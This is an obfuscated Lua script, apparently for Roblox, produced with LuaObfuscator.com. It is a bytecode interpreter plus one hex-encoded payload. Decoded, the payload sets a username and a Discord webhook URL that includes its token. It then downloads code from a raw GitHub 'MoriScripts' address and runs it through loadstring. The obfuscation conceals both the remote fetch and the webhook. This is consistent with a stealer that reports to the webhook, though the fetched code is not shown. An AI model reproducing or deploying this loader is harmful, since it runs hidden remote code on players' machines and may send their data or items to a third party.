--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v69=0 -0 ;local v70;while true do if (v69==((0 + 0) -(0 -0))) then v70=(v31/((3 -1)^(v32-1)))%((4 -2)^(((v33-1) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v70-(v70%1) ;end end else local v71=568 -(367 + 201) ;local v72;while true do if (v71==(927 -(214 + 713))) then v72=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v72 + v72))>=v72) and (878 -(282 + 595))) or (1637 -(1523 + (1179 -(68 + 997)))) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=1270 -(226 + 1044) ;local v35;local v36;local v37;local v38;while true do if (v34==(4 -3)) then return (v38 * (31011612 -14234396)) + (v37 * (65653 -(32 + 85))) + (v36 * ((460 -209) + 5)) + v35 ;end if (v34==(0 + 0)) then v35,v36,v37,v38=v1(v16,v19,v19 + 3 );v19=v19 + (961 -(892 + 65)) ;v34=2 -1 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=1905 -(1881 + 24) ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39~=(2 -1)) then else local v75=0 -0 ;while true do if (v75==(378 -(142 + 235))) then v39=1765 -(454 + 1309) ;break;end if (v75~=(0 -0)) then else v42=nil;v43=nil;v75=1 + 0 ;end end end if (v39~=(0 + 0)) then else local v76=0;local v77;while true do if (v76==0) then v77=0 -0 ;while true do if (v77~=(1 + 0)) then else v39=1;break;end if (v77~=(0 -0)) then else local v110=0 -0 ;while true do if (1==v110) then v77=2 -1 ;break;end if (v110==(285 -(134 + 151))) then v40=0;v41=nil;v110=1 + 0 ;end end end end break;end end end if (v39~=3) then else v46=nil;while true do local v82=1665 -(970 + 695) ;local v83;while true do if (v82~=(0 -0)) then else v83=0 + 0 ;while true do if (v83~=(2 -1)) then else if (v40==(0 -0)) then local v119=1990 -(582 + 1408) ;local v120;while true do if (v119==(0 -0)) then v120=0;while true do if (v120~=(0 -0)) then else v41={};v42={};v120=4 -3 ;end if (v120==1) then v43={};v44={v41,v42,nil,v43};v120=1331 -(797 + 532) ;end if (v120==(2 + 0)) then v40=242 -(187 + 54) ;break;end end break;end end end break;end if (v83~=(780 -(162 + 618))) then else local v111=0;local v112;while true do if (v111~=(0 -0)) then else v112=0 + 0 ;while true do if (v112~=(0 + 0)) then else local v166=1130 -(369 + 761) ;while true do if (v166==(1 + 0)) then v112=1 -0 ;break;end if (v166~=0) then else if (v40==(1 -0)) then local v171=0 -0 ;local v172;while true do if (v171==0) then v172=0;while true do if (v172~=1) then else local v176=0;while true do if (v176~=(0 + 0)) then else for v179=1637 -(1373 + 263) ,v45 do local v180=0 -0 ;local v181;local v182;local v183;local v184;local v185;while true do if (v180~=(1002 -(451 + 549))) then else v185=nil;while true do if (0==v181) then local v194=0 + 0 ;while true do if (v194~=0) then else v182=0;v183=nil;v194=1 -0 ;end if (v194~=(1 -0)) then else v181=1385 -(746 + 638) ;break;end end end if (v181~=2) then else while true do if (v182==(337 -(144 + 192))) then v185=nil;while true do if (v183~=(1 + 0)) then else if (v184==(1 -0)) then v185=v22()~=(341 -(218 + 123)) ;elseif (v184==(1583 -(1535 + 46))) then v185=v25();elseif (v184~=(3 + 0)) then else v185=v26();end v46[v179]=v185;break;end if (v183~=(0 + 0)) then else local v199=0 + 0 ;while true do if (1~=v199) then else v183=561 -(306 + 254) ;break;end if (v199~=(1580 -(1183 + 397))) then else local v206=0;while true do if (v206~=(0 + 0)) then else v184=v22();v185=nil;v206=1 -0 ;end if ((1468 -(899 + 568))~=v206) then else v199=1 + 0 ;break;end end end end end end break;end if (v182==(1975 -(1913 + 62))) then local v196=0 -0 ;while true do if (v196~=(604 -(268 + 335))) then else v182=1;break;end if (v196==0) then v183=290 -(60 + 230) ;v184=nil;v196=573 -(426 + 146) ;end end end end break;end if (v181==1) then local v195=0 + 0 ;while true do if (v195~=1) then else v181=1935 -(565 + 1368) ;break;end if (v195==(1456 -(282 + 1174))) then v184=nil;v185=nil;v195=812 -(569 + 242) ;end end end end break;end if (v180~=1) then else v183=nil;v184=nil;v180=2;end if (v180~=(1661 -(1477 + 184))) then else v181=0 -0 ;v182=nil;v180=1;end end end v44[3 + 0 ]=v22();v176=2 -1 ;end if (v176~=1) then else v172=1 + 1 ;break;end end end if (v172~=(1024 -(706 + 318))) then else local v177=0;while true do if (v177~=0) then else v45=v24();v46={};v177=857 -(564 + 292) ;end if (v177~=(1252 -(721 + 530))) then else v172=1272 -(945 + 326) ;break;end end end if (v172==(5 -3)) then v40=2;break;end end break;end end end if (v40~=2) then else local v173=304 -(244 + 60) ;local v174;local v175;while true do if (v173~=(2 -1)) then else while true do if ((476 -(41 + 435))~=v174) then else v175=1001 -(938 + 63) ;while true do if ((0 + 0)~=v175) then else for v186=701 -(271 + 429) ,v24() do local v187=0 + 0 ;local v188;local v189;local v190;local v191;while true do if (v187==(1 + 1)) then while true do if (v188~=(1614 -(1565 + 48))) then else v191=nil;while true do if (v189~=0) then else local v197=0;while true do if (v197~=0) then else v190=0;v191=nil;v197=1501 -(1408 + 92) ;end if ((1087 -(461 + 625))~=v197) then else v189=1289 -(993 + 295) ;break;end end end if (v189~=(1139 -(782 + 356))) then else while true do if (v190~=(267 -(176 + 91))) then else v191=v22();if (v21(v191,2 -1 ,1)~=0) then else local v200=0 -0 ;local v201;local v202;local v203;local v204;local v205;while true do if (v200==(1 + 1)) then v205=nil;while true do if (v201==(1092 -(975 + 117))) then local v207=1171 -(418 + 753) ;local v208;while true do if (v207==0) then v208=0;while true do if (v208~=(0 + 0)) then else local v217=0 + 0 ;while true do if (v217==(0 + 0)) then v202=0 + 0 ;v203=nil;v217=3 -2 ;end if (v217~=(530 -(406 + 123))) then else v208=1770 -(1749 + 20) ;break;end end end if (v208~=(1 + 0)) then else v201=1323 -(1249 + 73) ;break;end end break;end end end if (v201~=(1 + 1)) then else while true do if (v202~=(1145 -(466 + 679))) then else local v209=0;local v210;while true do if (v209==(0 -0)) then v210=0 -0 ;while true do if (v210~=1) then else v202=1 + 0 ;break;end if (v210~=(1900 -(106 + 1794))) then else local v219=0;local v220;while true do if ((0 + 0)==v219) then v220=0 -0 ;while true do if ((0 + 0)==v220) then v203=v21(v191,2,1230 -(322 + 905) );v204=v21(v191,11 -7 ,16 -10 );v220=115 -(4 + 110) ;end if (v220==(585 -(57 + 527))) then v210=1;break;end end break;end end end end break;end end end if ((1428 -(41 + 1386))==v202) then local v211=103 -(17 + 86) ;while true do if (v211~=1) then else v202=2 + 0 ;break;end if (v211~=(440 -(382 + 58))) then else local v218=0 -0 ;while true do if (v218==(0 -0)) then v205={v23(),v23(),nil,nil};if (v203==(0 -0)) then local v221=0;local v222;while true do if (v221==(1205 -(902 + 303))) then v222=0;while true do if (v222==0) then v205[5 -2 ]=v23();v205[4 + 0 ]=v23();break;end end break;end end elseif (v203==1) then v205[3]=v24();elseif (v203==(1 + 1)) then v205[3]=v24() -((4 -2)^(32 -16)) ;elseif (v203~=(68 -(30 + 35))) then else local v231=0;local v232;while true do if (v231==(0 + 0)) then v232=214 -(22 + 192) ;while true do if (v232~=0) then else v205[686 -(483 + 200) ]=v24() -(2^(1273 -(1043 + 214))) ;v205[1467 -(1404 + 59) ]=v23();break;end end break;end end end v218=1;end if (1==v218) then v211=2 -1 ;break;end end end end end if (v202==(3 -0)) then if (v21(v204,11 -8 ,3)==(766 -(468 + 297))) then v205[1216 -(323 + 889) ]=v46[v205[10 -6 ]];end v41[v186]=v205;break;end if (v202==2) then local v213=580 -(361 + 219) ;local v214;while true do if (v213==(0 -0)) then v214=320 -(53 + 267) ;while true do if (v214==0) then if (v21(v204,1 + 0 ,1)~=1) then else v205[2]=v46[v205[2 -0 ]];end if (v21(v204,1 + 1 ,238 -(141 + 95) )==1) then v205[416 -(15 + 398) ]=v46[v205[985 -(18 + 964) ]];end v214=3 -2 ;end if (v214~=(1 + 0)) then else v202=2 + 1 ;break;end end break;end end end end break;end if (v201==(851 -(20 + 830))) then v204=nil;v205=nil;v201=5 -3 ;end end break;end if (v200==0) then v201=0 + 0 ;v202=nil;v200=1;end if (v200==1) then v203=nil;v204=nil;v200=2 + 0 ;end end end break;end end break;end end break;end if ((0 + 0)==v188) then v189=126 -(116 + 10) ;v190=nil;v188=1;end end break;end if ((1 + 0)==v187) then v190=nil;v191=nil;v187=740 -(542 + 196) ;end if ((0 -0)~=v187) then else v188=0 + 0 ;v189=nil;v187=1;end end end for v192=1 + 0 ,v24() do v42[v192-(1 + 0) ]=v29();end v175=1;end if (v175~=(766 -(574 + 191))) then else return v44;end end break;end end break;end if (0~=v173) then else v174=0 + 0 ;v175=nil;v173=1 + 0 ;end end end v166=1;end end end if (v112==(2 -1)) then v83=2 -1 ;break;end end break;end end end end break;end end end break;end if (v39==(851 -(254 + 595))) then local v78=0;while true do if ((126 -(55 + 71))~=v78) then else local v105=1551 -(1126 + 425) ;while true do if ((405 -(118 + 287))~=v105) then else v44=nil;v45=nil;v105=1 -0 ;end if (1==v105) then v78=1;break;end end end if (v78==(3 -2)) then v39=1124 -(118 + 1003) ;break;end end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=0;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v47==(1793 -((1634 -(810 + 251)) + 1217))) then if (v52==(0 -(0 + 0))) then if (v51==0) then return v53 * 0 ;else v52=1 + 0 ;v50=0 -0 ;end elseif (v52==(2986 -(714 + 225))) then return ((v51==(0 -(0 + 0))) and (v53 * ((1 -0)/(0 + 0 + 0)))) or (v53 * NaN) ;end return v8(v53,v52-(1480 -457) ) * (v50 + (v51/((808 -(118 + 688))^52))) ;end if (((581 -(43 + 490)) -(25 + 23))==v47) then v48=v24();v49=v24();v47=1 + 0 ;end if (v47==2) then v52=v21(v49,1907 -(927 + 959) ,104 -73 );v53=((v21(v49,764 -((749 -(711 + 22)) + 716) )==(1 -0)) and  -(98 -(11 + 86))) or (2 -1) ;v47=3;end if (v47==(286 -(175 + 110))) then v50=2 -1 ;v51=(v21(v49,4 -3 ,77 -57 ) * ((1798 -(503 + 1293))^(89 -57))) + v48 ;v47=2 + 0 ;end end end v26=nil;function v26(v54)local v55=859 -((775 -535) + 619) ;local v56;local v57;while true do if (v55==(1 + 1)) then v57={};for v84=1 -0 , #v56 do v57[v84]=v2(v1(v3(v56,v84,v84)));end v55=1742 -(404 + 1335) ;end if (v55==(1 + 0)) then v56=v3(v16,v19,(v19 + v54) -(1745 -(1344 + 400)) );v19=v19 + v54 ;v55=2;end if (v55==(408 -(255 + 150))) then return v6(v57);end if (v55==(0 + 0)) then v56=nil;if  not v54 then local v101=0;while true do if (v101==0) then v54=v24();if (v54==(0 + 0)) then return "";end break;end end end v55=4 -3 ;end end end v18=5;end if (v18==2) then function v22()local v58=v1(v16,v19,v19);v19=v19 + 1 ;return v58;end v23=nil;function v23()local v59,v60=v1(v16,v19,v19 + (408 -(183 + 223)) );v19=v19 + (2 -0) ;return (v60 * (170 + 86)) + v59 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then local v73=0;while true do if (v73==0) then v20=v0(v3(v61,1,1));return "";end end else local v74=v2(v0(v61,16));if v20 then local v86=v5(v74,v20);v20=nil;return v86;else return v74;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (1==v65) then v68=v62[3];return function(...)local v87=v66;local v88=v67;local v89=v68;local v90=v28;local v91=1;local v92= -1;local v93={};local v94={...};local v95=v12("#",...) -1 ;local v96={};local v97={};for v102=0,v95 do if (v102>=v89) then v93[v102-v89 ]=v94[v102 + 1 ];else v97[v102]=v94[v102 + 1 ];end end local v98=(v95-v89) + 1 ;local v99;local v100;while true do v99=v87[v91];v100=v99[1];if (v100<=5) then if (v100<=2) then if (v100<=0) then local v113=0;while true do if (v113==0) then v64[v99[3]]=v97[v99[2]];v91=v91 + 1 ;v99=v87[v91];v97[v99[2]]=v99[3];v113=1;end if (v113==2) then v99=v87[v91];v97[v99[2]]=v99[3];v91=v91 + 1 ;v99=v87[v91];v113=3;end if (v113==1) then v91=v91 + 1 ;v99=v87[v91];v64[v99[3]]=v97[v99[2]];v91=v91 + 1 ;v113=2;end if (v113==3) then v91=v99[3];break;end end elseif (v100>1) then v91=v99[3];else local v122=0;local v123;while true do if (v122==0) then v123=v99[2];v97[v123]=v97[v123](v13(v97,v123 + 1 ,v92));break;end end end elseif (v100<=3) then v97[v99[2]]();elseif (v100>4) then v97[v99[2]]=v99[3];else local v126;local v127,v128;local v129;local v130;v64[v99[3]]=v97[v99[2]];v91=v91 + 1 ;v99=v87[v91];v97[v99[2]]=v64[v99[3]];v91=v91 + 1 ;v99=v87[v91];v97[v99[2]]=v64[v99[3]];v91=v91 + 1 ;v99=v87[v91];v130=v99[2];v129=v97[v99[3]];v97[v130 + 1 ]=v129;v97[v130]=v129[v99[4]];v91=v91 + 1 ;v99=v87[v91];v97[v99[2]]=v99[3];v91=v91 + 1 ;v99=v87[v91];v97[v99[2]]=v99[3]~=0 ;v91=v91 + 1 ;v99=v87[v91];v130=v99[2];v127,v128=v90(v97[v130](v13(v97,v130 + 1 ,v99[3])));v92=(v128 + v130) -1 ;v126=0;for v160=v130,v92 do local v161=0;while true do if (v161==0) then v126=v126 + 1 ;v97[v160]=v127[v126];break;end end end v91=v91 + 1 ;v99=v87[v91];v130=v99[2];v97[v130]=v97[v130](v13(v97,v130 + 1 ,v92));v91=v91 + 1 ;v99=v87[v91];v97[v99[2]]();v91=v91 + 1 ;v99=v87[v91];v91=v99[3];end elseif (v100<=8) then if (v100<=6) then local v114=v99[2];local v115=v97[v99[3]];v97[v114 + 1 ]=v115;v97[v114]=v115[v99[4]];elseif (v100>7) then if (v97[v99[2]]==v99[4]) then v91=v91 + 1 ;else v91=v99[3];end else v97[v99[2]]=v64[v99[3]];end elseif (v100<=10) then if (v100==9) then v97[v99[2]]=v99[3]~=0 ;else do return;end end elseif (v100==11) then local v143=v99[2];local v144,v145=v90(v97[v143](v13(v97,v143 + 1 ,v99[3])));v92=(v145 + v143) -1 ;local v146=0;for v162=v143,v92 do v146=v146 + 1 ;v97[v162]=v144[v146];end else v64[v99[3]]=v97[v99[2]];end v91=v91 + 1 ;end end;end if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030B3O005737636847616D65725954030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747303083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O353437343531323139323735333639342F3256726A344E3733374355427A356D5A5F5153324C4A78506F306A67664266362D6E783351766E355A364A484E6C4C7A523879377052784B6777727871314341746D626800173O0012053O00013O0026083O000E000100020004023O000E0001001205000100043O001204000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O001600010026083O0001000100010004023O00010001001205000100043O00122O000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O000A3O00017O00",v9(),...);
